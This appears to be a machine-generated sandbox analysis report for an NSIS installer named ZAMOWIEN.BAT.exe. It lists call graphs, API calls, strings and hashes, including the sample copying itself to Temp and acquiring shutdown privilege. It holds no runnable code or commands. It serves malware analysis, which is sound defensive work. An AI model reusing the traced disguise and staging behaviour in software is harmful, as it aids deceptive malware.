4703->4705 4704->4705 4706->4683 4707->4674 4708->4675 4712 4058ff 4709->4712 4710 40594b 4710->4683 4711 405913 MessageBoxIndirectW 4711->4710 4712->4710 4712->4711 4713 4027ef 4714 4027f6 4713->4714 4716 402a70 4713->4716 4715 402c1f 17 API calls 4714->4715 4717 4027fd 4715->4717 4718 40280c SetFilePointer 4717->4718 4718->4716 4719 40281c 4718->4719 4721 4061cb wsprintfW 4719->4721 4721->4716 5544 705010e1 5545 70501111 5544->5545 5546 705011d8 GlobalFree 5545->5546 5547 705012ba 2 API calls 5545->5547 5548 705011d3 5545->5548 5549 70501272 2 API calls 5545->5549 5550 70501164 GlobalAlloc 5545->5550 5551 705011f8 GlobalFree 5545->5551 5552 705011c4 GlobalFree 5545->5552 5553 705012e1 lstrcpyW 5545->5553 5547->5545 5548->5546 5549->5552 5550->5545 5551->5545 5552->5545 5553->5545 5554 401a72 5555 402c1f 17 API calls 5554->5555 5556 401a7b 5555->5556 5557 402c1f 17 API calls 5556->5557 5558 401a20 5557->5558 5566 401573 5567 401583 ShowWindow 5566->5567 5568 40158c 5566->5568 5567->5568 5569 402ac5 5568->5569 5570 40159a ShowWindow 5568->5570 5570->5569 5571 401cf3 5572 402c1f 17 API calls 5571->5572 5573 401cf9 IsWindow 5572->5573 5574 401a20 5573->5574 5575 402df3 5576 402e05 SetTimer 5575->5576 5577 402e1e 5575->5577 5576->5577 5578 402e73 5577->5578 5579 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5577->5579 5579->5578 5580 4014f5 SetForegroundWindow 5581 402ac5 5580->5581 5582 402576 5583 402c41 17 API calls 5582->5583 5584 40257d 5583->5584 5587 405d7a GetFileAttributesW CreateFileW 5584->5587 5586 402589 5587->5586 4908 401b77 4909 401b84 4908->4909 4910 401bc8 4908->4910 4911 401c0d 4909->4911 4916 401b9b 4909->4916 4912 401bf2 GlobalAlloc 4910->4912 4913 401bcd 4910->4913 4915 4062a6 17 API calls 4911->4915 4922 4022f7 4911->4922 4914 4062a6 17 API calls 4912->4914 4913->4922 4929 406284 lstrcpynW 4913->4929 4914->4911 4917 4022f1 4915->4917 4927 406284 lstrcpynW 4916->4927 4923 4058ea MessageBoxIndirectW 4917->4923 4920 401bdf GlobalFree 
4920->4922 4921 401baa 4928 406284 lstrcpynW 4921->4928 4923->4922 4925 401bb9 4930 406284 lstrcpynW 4925->4930 4927->4921 4928->4925 4929->4920 4930->4922 5588 4024f8 5589 402c81 17 API calls 5588->5589 5590 402502 5589->5590 5591 402c1f 17 API calls 5590->5591 5592 40250b 5591->5592 5593 402533 RegEnumValueW 5592->5593 5594 402527 RegEnumKeyW 5592->5594 5596 40288b 5592->5596 5595 402548 RegCloseKey 5593->5595 5594->5595 5595->5596 5598 40167b 5599 402c41 17 API calls 5598->5599 5600 401682 5599->5600 5601 402c41 17 API calls 5600->5601 5602 40168b 5601->5602 5603 402c41 17 API calls 5602->5603 5604 401694 MoveFileW 5603->5604 5605 4016a0 5604->5605 5606 4016a7 5604->5606 5608 401423 24 API calls 5605->5608 5607 4065c7 2 API calls 5606->5607 5610 402250 5606->5610 5609 4016b6 5607->5609 5608->5610 5609->5610 5611 40604a 36 API calls 5609->5611 5611->5605 5612 401e7d 5613 402c41 17 API calls 5612->5613 5614 401e83 5613->5614 5615 402c41 17 API calls 5614->5615 5616 401e8c 5615->5616 5617 402c41 17 API calls 5616->5617 5618 401e95 5617->5618 5619 402c41 17 API calls 5618->5619 5620 401e9e 5619->5620 5621 401423 24 API calls 5620->5621 5622 401ea5 5621->5622 5629 4058b0 ShellExecuteExW 5622->5629 5624 401ee7 5627 40288b 5624->5627 5630 40670f WaitForSingleObject 5624->5630 5626 401f01 CloseHandle 5626->5627 5629->5624 5631 406729 5630->5631 5632 40673b GetExitCodeProcess 5631->5632 5633 40669a 2 API calls 5631->5633 5632->5626 5634 406730 WaitForSingleObject 5633->5634 5634->5631 5635 4019ff 5636 402c41 17 API calls 5635->5636 5637 401a06 5636->5637 5638 402c41 17 API calls 5637->5638 5639 401a0f 5638->5639 5640 401a16 lstrcmpiW 5639->5640 5641 401a28 lstrcmpW 5639->5641 5642 401a1c 5640->5642 5641->5642 5643 401000 5644 401037 BeginPaint GetClientRect 5643->5644 5645 40100c DefWindowProcW 5643->5645 5647 4010f3 5644->5647 5648 401179 5645->5648 5649 401073 CreateBrushIndirect FillRect DeleteObject 5647->5649 5650 4010fc 5647->5650 5649->5647 5651 401102 
CreateFontIndirectW 5650->5651 5652 401167 EndPaint 5650->5652 5651->5652 5653 401112 6 API calls 5651->5653 5652->5648 5653->5652 5661 401503 5662 40150b 5661->5662 5664 40151e 5661->5664 5663 402c1f 17 API calls 5662->5663 5663->5664 4549 402484 4560 402c81 4549->4560 4552 402c41 17 API calls 4553 402497 4552->4553 4554 4024a2 RegQueryValueExW 4553->4554 4559 40288b 4553->4559 4555 4024c8 RegCloseKey 4554->4555 4556 4024c2 4554->4556 4555->4559 4556->4555 4565 4061cb wsprintfW 4556->4565 4561 402c41 17 API calls 4560->4561 4562 402c98 4561->4562 4563 4060f1 RegOpenKeyExW 4562->4563 4564 40248e 4563->4564 4564->4552 4565->4555 5665 402104 5666 402c41 17 API calls 5665->5666 5667 40210b 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402115 5668->5669 5670 402c41 17 API calls 5669->5670 5671 40211f 5670->5671 5672 402c41 17 API calls 5671->5672 5673 402129 5672->5673 5674 402c41 17 API calls 5673->5674 5676 402133 5674->5676 5675 402172 CoCreateInstance 5680 402191 5675->5680 5676->5675 5677 402c41 17 API calls 5676->5677 5677->5675 5678 401423 24 API calls 5679 402250 5678->5679 5680->5678 5680->5679 5681 401f06 5682 402c41 17 API calls 5681->5682 5683 401f0c 5682->5683 5684 4052ec 24 API calls 5683->5684 5685 401f16 5684->5685 5686 40586d 2 API calls 5685->5686 5687 401f1c 5686->5687 5688 401f3f CloseHandle 5687->5688 5690 40670f 5 API calls 5687->5690 5692 40288b 5687->5692 5688->5692 5691 401f31 5690->5691 5691->5688 5694 4061cb wsprintfW 5691->5694 5694->5688 4566 70502997 4567 705029e7 4566->4567 4568 705029a7 VirtualProtect 4566->4568 4568->4567 4657 40230c 4658 402314 4657->4658 4659 40231a 4657->4659 4660 402c41 17 API calls 4658->4660 4661 402328 4659->4661 4662 402c41 17 API calls 4659->4662 4660->4659 4663 402c41 17 API calls 4661->4663 4665 402336 4661->4665 4662->4661 4663->4665 4664 402c41 17 API calls 4666 40233f WritePrivateProfileStringW 4664->4666 4665->4664 5695 40190c 5696 401943 5695->5696 5697 402c41 17 API calls 5696->5697 5698 401948 
5697->5698 5699 405996 67 API calls 5698->5699 5700 401951 5699->5700 5701 401f8c 5702 402c41 17 API calls 5701->5702 5703 401f93 5702->5703 5704 40665e 5 API calls 5703->5704 5705 401fa2 5704->5705 5706 401fbe GlobalAlloc 5705->5706 5708 402026 5705->5708 5707 401fd2 5706->5707 5706->5708 5709 40665e 5 API calls 5707->5709 5710 401fd9 5709->5710 5711 40665e 5 API calls 5710->5711 5712 401fe3 5711->5712 5712->5708 5716 4061cb wsprintfW 5712->5716 5714 402018 5717 4061cb wsprintfW 5714->5717 5716->5714 5717->5708 5718 40238e 5719 4023c1 5718->5719 5720 402396 5718->5720 5721 402c41 17 API calls 5719->5721 5722 402c81 17 API calls 5720->5722 5723 4023c8 5721->5723 5724 40239d 5722->5724 5729 402cff 5723->5729 5726 402c41 17 API calls 5724->5726 5727 4023d5 5724->5727 5728 4023ae RegDeleteValueW RegCloseKey 5726->5728 5728->5727 5730 402d0c 5729->5730 5731 402d13 5729->5731 5730->5727 5731->5730 5733 402d44 5731->5733 5734 4060f1 RegOpenKeyExW 5733->5734 5735 402d72 5734->5735 5736 402d98 RegEnumKeyW 5735->5736 5737 402daf RegCloseKey 5735->5737 5738 402dd0 RegCloseKey 5735->5738 5740 402d44 6 API calls 5735->5740 5743 402dc3 5735->5743 5736->5735 5736->5737 5739 40665e 5 API calls 5737->5739 5738->5743 5741 402dbf 5739->5741 5740->5735 5742 402de0 RegDeleteKeyW 5741->5742 5741->5743 5742->5743 5743->5730 5744 40698e 5745 406812 5744->5745 5746 40717d 5745->5746 5747 406893 GlobalFree 5745->5747 5748 40689c GlobalAlloc 5745->5748 5749 406913 GlobalAlloc 5745->5749 5750 40690a GlobalFree 5745->5750 5747->5748 5748->5745 5748->5746 5749->5745 5749->5746 5750->5749 5751 40190f 5752 402c41 17 API calls 5751->5752 5753 401916 5752->5753 5754 4058ea MessageBoxIndirectW 5753->5754 5755 40191f 5754->5755 5756 70501000 5759 7050101b 5756->5759 5760 70501516 GlobalFree 5759->5760 5761 70501020 5760->5761 5762 70501024 5761->5762 5763 70501027 GlobalAlloc 5761->5763 5764 7050153d 3 API calls 5762->5764 5763->5762 5765 70501019 5764->5765 5766 70502301 5767 7050236b 5766->5767 
5768 70502376 GlobalAlloc 5767->5768 5769 70502395 5767->5769 5768->5767 5770 401491 5771 4052ec 24 API calls 5770->5771 5772 401498 5771->5772 5773 401d14 5774 402c1f 17 API calls 5773->5774 5775 401d1b 5774->5775 5776 402c1f 17 API calls 5775->5776 5777 401d27 GetDlgItem 5776->5777 5778 402592 5777->5778 5786 402598 5787 4025c7 5786->5787 5788 4025ac 5786->5788 5789 4025fb 5787->5789 5790 4025cc 5787->5790 5791 402c1f 17 API calls 5788->5791 5793 402c41 17 API calls 5789->5793 5792 402c41 17 API calls 5790->5792 5796 4025b3 5791->5796 5794 4025d3 WideCharToMultiByte lstrlenA 5792->5794 5795 402602 lstrlenW 5793->5795 5794->5796 5795->5796 5797 40262f 5796->5797 5798 402645 5796->5798 5800 405e5b 5 API calls 5796->5800 5797->5798 5799 405e2c WriteFile 5797->5799 5799->5798 5800->5797 5801 40149e 5802 4022f7 5801->5802 5803 4014ac PostQuitMessage 5801->5803 5803->5802 5804 401c1f 5805 402c1f 17 API calls 5804->5805 5806 401c26 5805->5806 5807 402c1f 17 API calls 5806->5807 5808 401c33 5807->5808 5809 401c48 5808->5809 5810 402c41 17 API calls 5808->5810 5811 401c58 5809->5811 5814 402c41 17 API calls 5809->5814 5810->5809 5812 401c63 5811->5812 5813 401caf 5811->5813 5815 402c1f 17 API calls 5812->5815 5816 402c41 17 API calls 5813->5816 5814->5811 5817 401c68 5815->5817 5818 401cb4 5816->5818 5819 402c1f 17 API calls 5817->5819 5820 402c41 17 API calls 5818->5820 5821 401c74 5819->5821 5822 401cbd FindWindowExW 5820->5822 5823 401c81 SendMessageTimeoutW 5821->5823 5824 401c9f SendMessageW 5821->5824 5825 401cdf 5822->5825 5823->5825 5824->5825 5826 402aa0 SendMessageW 5827 402ac5 5826->5827 5828 402aba InvalidateRect 5826->5828 5828->5827 5829 402821 5830 402827 5829->5830 5831 402ac5 5830->5831 5832 40282f FindClose 5830->5832 5832->5831 4382 403d22 4383 403e75 4382->4383 4384 403d3a 4382->4384 4386 403ec6 4383->4386 4387 403e86 GetDlgItem GetDlgItem 4383->4387 4384->4383 4385 403d46 4384->4385 4388 403d51 SetWindowPos 4385->4388 4389 403d64 4385->4389 4391 
403f20 4386->4391 4399 401389 2 API calls 4386->4399 4390 4041fb 18 API calls 4387->4390 4388->4389 4392 403d81 4389->4392 4393 403d69 ShowWindow 4389->4393 4394 403eb0 SetClassLongW 4390->4394 4400 403e70 4391->4400 4453 404247 4391->4453 4396 403da3 4392->4396 4397 403d89 DestroyWindow 4392->4397 4393->4392 4398 40140b 2 API calls 4394->4398 4402 403da8 SetWindowLongW 4396->4402 4403 403db9 4396->4403 4401 404184 4397->4401 4398->4386 4404 403ef8 4399->4404 4401->4400 4410 4041b5 ShowWindow 4401->4410 4402->4400 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4391 4409 403efc SendMessageW 4404->4409 4405 40140b 2 API calls 4423 403f32 4405->4423 4406 404186 DestroyWindow EndDialog 4406->4401 4475 404262 4407->4475 4411 403df5 4408->4411 4412 403dd8 SendMessageW IsWindowEnabled 4408->4412 4409->4400 4410->4400 4415 403e02 4411->4415 4416 403e15 4411->4416 4417 403e49 SendMessageW 4411->4417 4426 403dfa 4411->4426 4412->4400 4412->4411 4414 4062a6 17 API calls 4414->4423 4415->4417 4415->4426 4420 403e32 4416->4420 4421 403e1d 4416->4421 4417->4407 4419 4041fb 18 API calls 4419->4423 4425 40140b 2 API calls 4420->4425 4469 40140b 4421->4469 4422 403e30 4422->4407 4423->4400 4423->4405 4423->4406 4423->4414 4423->4419 4444 4040c6 DestroyWindow 4423->4444 4456 4041fb 4423->4456 4427 403e39 4425->4427 4472 4041d4 4426->4472 4427->4407 4427->4426 4429 403fad GetDlgItem 4430 403fc2 4429->4430 4431 403fca ShowWindow KiUserCallbackDispatcher 4429->4431 4430->4431 4459 40421d KiUserCallbackDispatcher 4431->4459 4433 403ff4 EnableWindow 4438 404008 4433->4438 4434 40400d GetSystemMenu EnableMenuItem SendMessageW 4435 40403d SendMessageW 4434->4435 4434->4438 4435->4438 4438->4434 4460 404230 SendMessageW 4438->4460 4461 403d03 4438->4461 4464 406284 lstrcpynW 4438->4464 4440 40406c lstrlenW 4441 4062a6 17 API calls 4440->4441 4442 404082 SetWindowTextW 4441->4442 4465 401389 4442->4465 4444->4401 4445 4040e0 CreateDialogParamW 4444->4445 4445->4401 4446 
404113 4445->4446 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4400 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4401 4454 404250 SendMessageW 4453->4454 4455 40425f 4453->4455 4454->4455 4455->4423 4457 4062a6 17 API calls 4456->4457 4458 404206 SetDlgItemTextW 4457->4458 4458->4429 4459->4433 4460->4438 4462 4062a6 17 API calls 4461->4462 4463 403d11 SetWindowTextW 4462->4463 4463->4438 4464->4440 4467 401390 4465->4467 4466 4013fe 4466->4423 4467->4466 4468 4013cb MulDiv SendMessageW 4467->4468 4468->4467 4470 401389 2 API calls 4469->4470 4471 401420 4470->4471 4471->4426 4473 4041e1 SendMessageW 4472->4473 4474 4041db 4472->4474 4473->4422 4474->4473 4476 40427a GetWindowLongW 4475->4476 4477 404325 4475->4477 4476->4477 4478 40428f 4476->4478 4477->4400 4478->4477 4479 4042bc GetSysColor 4478->4479 4480 4042bf 4478->4480 4479->4480 4481 4042c5 SetTextColor 4480->4481 4482 4042cf SetBkMode 4480->4482 4481->4482 4483 4042e7 GetSysColor 4482->4483 4484 4042ed 4482->4484 4483->4484 4485 4042f4 SetBkColor 4484->4485 4486 4042fe 4484->4486 4485->4486 4486->4477 4487 404311 DeleteObject 4486->4487 4488 404318 CreateBrushIndirect 4486->4488 4487->4488 4488->4477 5833 4015a3 5834 402c41 17 API calls 5833->5834 5835 4015aa SetFileAttributesW 5834->5835 5836 4015bc 5835->5836 5837 4046a5 5838 4046b5 5837->5838 5839 4046db 5837->5839 5841 4041fb 18 API calls 5838->5841 5840 404262 8 API calls 5839->5840 5843 4046e7 5840->5843 5842 4046c2 SetDlgItemTextW 5841->5842 5842->5839 5844 4029a8 5845 402c1f 17 API calls 5844->5845 5846 4029ae 5845->5846 5847 4029d5 5846->5847 5848 4029ee 5846->5848 5855 40288b 5846->5855 5849 4029da 5847->5849 5850 4029eb 5847->5850 5851 402a08 5848->5851 5852 4029f8 5848->5852 5858 406284 lstrcpynW 5849->5858 5850->5855 5859 4061cb wsprintfW 5850->5859 5854 4062a6 17 API calls 

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000020,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00420EA8,?,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                  • API String ID: 3441113951-4162361014
                                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                  • String ID: {$6B
                                                                                  • API String ID: 590372296-3705917127
                                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                                  [Control-flow graph of function 00405996; legend: Executed / Not Executed]
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 004059BF
                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A07
                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A2A
                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A30
                                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405A40
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                  Strings
                                                                                  • "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 00405996
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                                  • \*.*, xrefs: 00405A01
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                  • API String ID: 2035342205-1724476554
                                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
